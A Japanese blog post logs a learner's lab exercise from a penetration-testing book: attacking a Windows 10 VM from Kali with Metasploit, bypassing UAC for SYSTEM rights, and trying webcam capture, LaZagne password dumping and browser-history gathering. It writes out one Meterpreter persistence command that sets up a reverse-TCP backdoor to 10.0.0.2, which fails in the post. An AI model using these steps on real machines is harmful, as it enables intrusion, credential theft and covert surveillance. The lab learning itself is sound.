このコンテンツには閲覧パスワードが必要です。
【ハッキングラボを作ろう】#7 Windows10のハッキング 3
IPUSIRON著「ハッキング・ラボのつくりかた 仮想環境におけるハッカー体験学習」で勉強しています。
前回はWindow10をペネトレーションツールのMetasploitを使って攻撃して、攻撃側のKali側から侵入先のWin10の画面のスクショを取るところまでいきました。
その続きを進めていたのですが、色々ものすごくハマりました。ハマった箇所も記しますが、解決しなかったのが多いですね。。。
今回はWindowsの権限取得などを勧めていきます。前回は(6)まで行きましたのでその続きです。
(7)権限を昇格させる(SYSTEM権限を取得する)
Meterpreterプロンプトからgetuidコマンドで権限昇格をしてみますが、失敗するので、UACを回避するモジュールを探します。ここは書籍に従って進めていきます。なんとかSYSTEM権限を得られました。
(8)バックドアを設置する。
問題はここです。ここでものすごく嵌って結局解決できませんでした。
Meterpreterプロンプトから以下のコマンドを入力するのですが、
run persistence -X -i 60 -P windows/x64/meterpreter/reverse_tcp -p 4444 -r 10.0.0.2
Could not execute persistence: ArgumentError wrong number of arguments (given 2, expected 0..1)
というエラーが出て先に進みません。色々調べましたが解決策が見つかりませんでした。。。
ということでバックドアの作成はあきらめ先に進みます。
(9)ターゲット端末のWebカメラで盗撮する。
これもうまくいきませんでした。WindowsのノートPCの内蔵WebカメラはVirtualBoxでは認識していて、Kaliでも起動するのですが、MeterpreterプロンプトからWebcam_listを実行しても"No webcams were found”と出て先に進みませんでした。USB接続のカメラを推奨しているようですが、持ち合わせがないのでここも飛ばします。
(10)パスワードを探し出す。
Windowsに格納されているパスワードを探し出します。ここではLaZagneというツールを使います。ここは本書どおりに進めていけます。
一応、登録しておいたアカウントは見つかったのですが、特に上2つのは肝心なパスワードが空欄になっていて取得できていません。Edgeに入っているパスワードなのですが、そう簡単には抜けない仕組みになっているのかもしれません。一番下のSkypeは特にいじっていないのでデフォルトのもののような気がします。
(11)ブラウザの履歴を調べる
windows/gather/forensics/browser_historyというモジュールを使っていくのですが、うまく実行できませんでした。今日もここまでで4時間は費やしていて、心折れてきたのでまた今度にします。